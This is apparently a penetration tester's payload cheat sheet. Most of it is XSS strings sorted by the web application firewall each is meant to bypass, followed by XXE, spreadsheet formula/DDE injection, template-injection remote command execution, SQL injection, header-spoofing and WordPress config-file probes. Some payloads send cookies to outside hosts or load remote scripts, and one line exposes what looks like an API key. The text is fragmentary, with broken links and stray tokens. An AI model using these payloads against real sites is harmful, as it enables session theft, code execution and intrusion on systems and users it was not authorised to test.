EICARdropper
[Link]
[Link]
.*\.doit\.com$
[Link]
2X5whfaVv8a5ozTEMP_k&target=language
[Link]
ovNX0mzDrDlOoLEKWCH2EWOSQohg
--------------------------------------------------------------------------------------------------------------
----------------------------
Most Important XSS Payloads for WAF Bypass
--------------------------------------------------------------------------------------------------------------
----------------------------
Test<a href=javascript:alert(1)>click<a %00
src=\"	javascript:prompt([Link])	\"%00onclick=alert(1)> fooo
[Link] payloads, by @shrekysec
/(A('onerror=%22alert%601%60%22testabcd))/
/Orders/(A(%22onerror='alert%60xss%60'testabcd))/[Link]?ReturnUrl=/Orders
(A(%22onerror='alert%601%60'testabcd))/[Link]?ReturnUrl=%2f
"></SCRIPT>--
!><SCRIPT>alert([Link](88,83,83))</SCRIPT>%27}};">});});})]--
Bypass Filter JavaScript source code
--></SCRIPT>">'><SCRIPT>alert([Link](100, 111, 99, 117, 109, 101, 110,
116, 46, 99, 111, 111, 107, 105, 101))</SCRIPT>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//[Link]\76-->
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//[Link]\76-->
<button onClick={() => [Link]("javascript:(alert)(3)")}>Click</button>
i2lte%22%3e%3cscript%3ealert(1)%3c%2fscript%3eayawz
<A/HRef=javascript:top/**/?.['ale'%2B'rt'](1)>
<</div>script</div>>confirm()<</div>/script</div>>
<svg/onload=window["al"+"ert"]`1337`>
<img src="[Link]" usermap="#themap" width="99" height="99"><map
name="themap"><area coords="0,0,99,99" href="javascript:alert(1337)"></map>
<iframe src="javascript:setTimeout(function() {
/*\*/top['al'+'\u0065'+'rt']([Link])/*\*/ }, 5000);"></inpuT%3E;>
<inpuT autofocus oNFocus="setTimeout(function() {
/*\*/top['al'+'\u0065'+'rt']([Link])/*\*/ }, 5000);"></inpuT%3E;>
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
<!--
><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource]([Link]
kie)%27>
<div
onpointerover="javascript:eval(decodeURIComponent(String.f
romCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100,
111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26
%2300000000000000000041//
<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return
this')()[['al\u0065'+'rt'][0]]([[Link](8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
<video><source onerror="[Link]('return this')().alert('0f')">
<EMBED SRC="data:image/svg+xml;base64,PHN2Zy9vbmxvYWQ9d2luZG93WyJhbCIrI
mVydCJdYDEzMzdgPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBE
D>
<svg/onload=window[“al”+”ert”]`1337`>
<option><style></option></select><img src=x onerror=alert(1)></style>
<Svg Only=1 OnLoad=confirm(1)>
<input/onclick=alert(1)>
{{[Link]('alert([Link])')()}}
<image src/onerror=alert("Contact_Name")>
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click
me</button><hvita onbeforetoggle=+a+b+c+ popover id=x>Hvita</hvita>")
<a href=\"javascript:alert([Link])\" onClick=\"var a =\"}, var a=5;
prompt(7);function a(){var b={c: {d:{//\"\">Click Me</a>
<A href=javascript:alert(1)>asd
<script>alert()<\/script>
"/><img src=u onerror="alert([Link])"<
<details ontoggle=alert(1)>
<a href="data:text/html,<script>alert(1)</script>">Click Here</a>
<a target="_blank" href="[Link]
onhower=alert(2)>Safe</a>
<p><a href="[Link]
<a target="_blank"
href="data:text/URI,javascript:alert([Link]);">test</a>
<svg/onload=alert(/1/)>
<svg/on<script>load=prompt([Link]);>”/>
<script>x=new
XMLHttpRequest;[Link]=function(){[Link]([Link])};[Link](‘GET’,’
file:///etc/hosts’);[Link]();</script>
<noscript>&lt;p title=” </noscript><style onload=
alert([Link])//"> *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;}
</style>
<a href="j	a	v	asc
ri	pt:onclick=alert(1)">Click
me</a>
<script>[Link](0,0,’/i/am/somewhere_else’);</script><iframe
onload=”javascript:alert([Link])”>
<body onload="javascript:[Link]('\x2fportal\x2fc');">
--------------------------------------------------------------------------------------------------------------
----------------------------
Akamai Bypass XSS Payloads
--------------------------------------------------------------------------------------------------------------
----------------------------
<style>@keyframes
a{}b{animation:a;}</style><b/onanimationstart=prompt`${[Link]}`>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=a=alert,a(domain)>click
<x onauxclick=import('//1152848220/')>click
<x onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{[Link](alert`1`)()}}
javascript:new%20Function`al\ert\`1\``;
[Link]
[Link]
<script>[Link] = 1;[Link]='[Link]
[Link]/xss/[Link]'</script> -[Link]
scripting/cheat-sheet
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;[Link]("//hacke
[Link]/stealthy?x="+location)'>Click
--------------------------------------------------------------------------------------------------------------
----------------------------
Cloudflare Bypass XSS Payloads
--------------------------------------------------------------------------------------------------------------
----------------------------
<a"/onclick=(confirm)()>Click Here!
Dec: <svg onload=prompt%26%[Link])>
Hex: <svg onload=prompt%26%23x000000028;[Link])>
xss'"><iframe srcdoc='%26lt;script>;prompt`${[Link]}`%26lt;/script>'>
<a
href="j	a	v	asc
ri	pt:(a	l	e	r&Ta
b;t	([Link]))">X</a>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
<a+HREF='%26%237javascrip%26%239t:alert%26lpar;[Link])'>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img src=x onError=import('//1152848220/')>
%2sscript%2ualert()%2s/script%2u
<svg on onload=(alert)([Link])>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(1)>
“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;docume
[Link]%26%2300000000000000000041;
<svg on =i onload=alert(domain)
<svg/onload=location/**/='[Link]
<svg onx=() onload=[Link]?.()>
test",prompt%0A/*HelloWorld*/([Link])
"onx+%00+onpointerenter%3dalert(domain)+x"
"><svg%20onload=alert%26%230000000040"1")>
%27%09);%0d%0a%09%09[1].find(alert)//
"><img src=1 onmouseleave=print()>
<svg on onload=(alert)([Link])>
<svg/on%20onload=alert(1)> (working)
<img/src=x onError="`${x}`;alert(`[Link]`);">
--------------------------------------------------------------------------------------------------------------
----------------------------
Cloudfront Bypass XSS Payloads
--------------------------------------------------------------------------------------------------------------
----------------------------
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x
onerror=javascript:alert(`cloudfrontbypass`)//'>
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
"><img src=x onerror=confirm(1);>
--------------------------------------------------------------------------------------------------------------
----------------------------
Imperva Bypass XSS Payloads
--------------------------------------------------------------------------------------------------------------
----------------------------
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
tarun"><x/onafterscriptexecute=confirm%26lpar;)//
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+
v+h+n)(/infected/.source)" />click
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%
2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
<svg onload\r\n=$.globalEval("al"+"ert()");>
<bleh/onclick=top[/al/.source+/ert/.source]	``>click
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v
+h+n)(/infected/.source)" />tap
--------------------------------------------------------------------------------------------------------------
----------------------------
Incapsula Bypass XSS Payloads
--------------------------------------------------------------------------------------------------------------
----------------------------
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<iframe/onload="var b = '[Link])'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;
this['src']=a">
<audio autoplay onloadstart=[Link]='hxxps://[Link]/?c='+document["cook"+"ie"]'
src=x>
<img/src=q onerror='new Function`al\ert\`1\``'>
<object
data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></obje
ct>
<svg onload\r\n=$.globalEval("al"+"ert()");>
[1].map(alert) or (alert)(1)
<"><details/open/ontoggle="jAvAsCrIpT:alert(/xss-by-
tarun/)">XXXXX</a>
[1].find(confirm)
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwv
c2NyaXB0Pg==%3E%3C/object%3E
'-[[Link]].map(alert)-'
--------------------------------------------------------------------------------------------------------------
----------------------------
Wordfence Bypass XSS Payloads
--------------------------------------------------------------------------------------------------------------
----------------------------
ax6zt%2522%253e%253cscript%253ealert%[Link]%2529%253c%25
2fscript%253ey6uu6
<meter onmouseover="alert(1)" -@manjith27945363
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
Wordfence 7.4.2
<a href=javascript:alert(1)>
<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20cl
ick%20here</a>
--------------------------------------------------------------------------------------------------------------
----------------------------
For Slack
--------------------------------------------------------------------------------------------------------------
----------------------------
'"<b oncut=alert(3)>asd</b>>
slack '"><sript>var a= 4;</script> test '"><script>var a =1; </script>
'"><img src=u onerror=alert(21)>
<script>alert(1)</script>
'"><b>ssss<a href="[Link]">ssss</a><img/src='u'/onerror=alert(7777)>
'"><b>ss<a href="[Link]">ssss</a><img/src='u'/onerror=alert()>
"'><img src=u onerror=alert(1)>
<a href="[Link]
[click here]([Link]
--------------------------------------------------------------------------------------------------------------
----------------------------
Random Payloads
--------------------------------------------------------------------------------------------------------------
----------------------------
test1 <a href="data:text/html,<script>alert(1)</script>">Click Here</a>
';alert([Link](88,83,83))//';alert([Link](88,83,83))//";alert(
[Link](88,83,83))//";alert([Link](88,83,83))//--
></SCRIPT>">'><SCRIPT>alert([Link](88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=[Link]
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert([Link])">xxs link</a>
<a onmouseover=alert([Link])>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert([Link](88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert([Link](88,83,83))"></img>
<IMG
SRC=javascript:a&
#108;ert(
'XSS')>
<IMG
SRC=javascr&
#0000105pt:a&
#0000108ert('X�
083S')>
<IMG
SRC=javascript:a
Cert('XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="[Link]
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="[Link]
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=[Link] B >
<SCRIPT SRC=//[Link]/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=[Link] <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="[Link]
<STYLE>@import'[Link]
<META HTTP-EQUIV="Link" Content="<[Link] REL=stylesheet">
<STYLE>BODY{-moz-binding:url("[Link]
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url([Link]);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=[Link]
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert([Link])"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\007
4\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="[Link]
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT
SRC=[Link]
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG
SRC="[Link]
scode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="[Link]
<SCRIPT =">" SRC="[Link]
<SCRIPT a=">" '' SRC="[Link]
<SCRIPT "a='>'" SRC="[Link]
<SCRIPT a=`>` SRC="[Link]
<SCRIPT a=">'>" SRC="[Link]
<SCRIPT>[Link]("<SCRI");</SCRIPT>PT
SRC="[Link]
<A HREF="[Link]
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
test</a>
Vue.js
{{$[Link]`fetch(%27[Link]
m%27,%20{%20method:%20%27POST%27,%20mode:%20%27no-
cors%27,%20body:%[Link]%20});`()}}
{{$[Link]`function b(){eval([Link])};a=new
XMLHttpRequest();[Link]("load", b);[Link]("GET",
"//[Link]/s/sid0krypt");[Link]()`()}}
{{_Vue.[Link]('x','[Link]("HI this is sid0krypt")')(this)}}
{{_Vue.[Link]('x','[Link](x)')(this)}}
{{_Vue.[Link]`alert(1)`()}}
{{$[Link]`alert(1)`()}}
${\"zjz\".toString().replace(\"j\", \"o\")}
${'a'.getClass().forName('[Link]').newInstance().getEngineB
yName('JavaScript').eval(\"var x=new [Link];
[Link](\\\"ping\\\",\\\"[Link]\\\
"); [Link]([Link]().getInputStream())\")}
XML External Entity (XXE) Injection
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM
"[Link] > ]><test>&xxe</test><svg
xmlns="[Link] font-size="16" x="10"
y="40">%26xxe1;</text></svg>, <?xml version="1.0" standalone="yes"?><!DOCTYPE
test [ <!ENTITY
xxe1 SYSTEM "[Link] > ]><svg
xmlns="[Link] font-size="16" x="10"
y="40">%26xxe1;</text></svg>
*********HTML Injection*********
<a href=[Link]
<a href=[Link]
<a href=[Link] here</a>
*********Formula Injection*********
=calc|A0!Z
@calc|A0!Z
=cmd|' /C calc'!xxx
=cmd|'/[Link]'!z
=cmd|' /C notepad'!'A1'
DDE ("cmd";"/C calc";"!A0")A0
%0A-3+3+cmd|' /C calc'!D2
*********Command Execution*********
=WEBSERVICE("[Link]
=WEBSERVICE("[Link]
=INFO("/etc/passwd"),
=INFO("SYSTEM"),
=INFO("OSVERSION")
*********CSRF*********
[Link] ----
JSON Padding
[Link] ------------------------------------- JSON Padding
Convert JSON into x-www-form-urlencoded:
replace ":" with "=" and "," with "&"
[Link] Padding oracle
[Link] check in the URL
Web cache poisoning
cookie language:en
cookie language:pl -> 400 or 403
X-Forwarded-Host: Blueinfy
then the same response comes back in the main request
try with the GET method
[Link]
<?xml version="1.0"?>
<methodCall>
<methodName>[Link]</methodName>
<params>
</params>
</methodCall>
[Link]
<?xml version="1.0"?>
<methodCall>
<methodName>[Link]</methodName>
<params><params>
<value><string>[Link]
</param><param><value><string>[Link]
</value></param></params>
</methodCall>
curl [Link]
--------------------------------------------------------------------------------------------------------------
----------------------------
WordPress
--------------------------------------------------------------------------------------------------------------
----------------------------
/.htaccess
/wp-includes/
/wp-json/
/wp-content/uploads/
/wp-json/wp/v2/users
/wp-admin
/wp-admin/[Link]
/wp-json/?rest_route=/wp/v2/users/
/wp-confi[Link]-backup /wp-confi[Link]
/.wp-confi[Link]
/wp-confi[Link] /wp-confi[Link]
/wp-confi[Link]
/wp-confi[Link]
/wp-confi[Link]
/wp-confi[Link]
/wp-confi[Link]
/wp-confi[Link]
/wp-confi[Link]
/wp-confi[Link]
/wp-confi[Link]
/wp-confi[Link] /wp-confi[Link]
/wp-confi[Link]~
/wp-confi[Link]
/_wpeprivate/confi[Link]
WordPress Elementor Website Builder plugin, versions <= 3.5.5
#elementor-
action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidml
kZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZ
W50LmRvbWFpbikifX0=
[Link] ------CVSS Score
{{5*5}}
{{7,*7}} ------Template injection
[Link]
x-forwarded-scheme: http
X-forwarded-host: host
X-Real-IP: [Link]
X-Client-IP: [Link]
X-Rewrite-URL: [Link]
X-Remote-IP: [Link]
X-Remote-Addr: [Link]
X-ProxyUser-Ip: [Link]
X-Originating-IP: [Link]
X-Original-URL: [Link]
X-Forwarded: [Link]
X-Forwarded-For: [Link]
X-Custom-IP-Authorization: [Link]
True-Client-IP: [Link]
Intercom ChatBot Security Misconfiguration:
Intercom('boot', { email: 'xyz@[Link]' });
HelpCrunch ChatBot Security Misconfiguration:
HelpCrunch('userAuth', {user_id: 'xyz@[Link]'});
Bot Framework (Microsoft Azure):
[Link]({userEmail:'xyz@[Link]'});
[Link]
.com
[Link]
' waitfor delay'[Link]'--
Error based
Union based
Blind - Time and Boolean
Second order SQL Injection
Update user password='123' where username = 'xyz' and password = '123'
Update user password='123' where username ='xyz'-- and
Broken Access Control
Cryptographic Failures
Injection
Insecure Design
Security Misconfiguration
Vulnerable and Outdated Components
Authentication or identification Failure
Software Data and Integrity Failures
Security Logging and Monitoring Failures
SSRF
<?php system(id); ?>
Firebase:
[Link]
cbddbd0e71e3
[Link]
database
__/firebase/[Link]
GET /v1alpha/projects/-
/apps/1:361636954636:web:220eedf13a3a1aa0d36429/webConfig HTTP/2
Host: fi[Link]
X-Goog-Api-Key: AIzaSyB8KMna82QZS8RR9mIjO-xOzq19E4Vx-gg
If you find SSRF, go for the [Link]
Hint: `whoami`.<burp>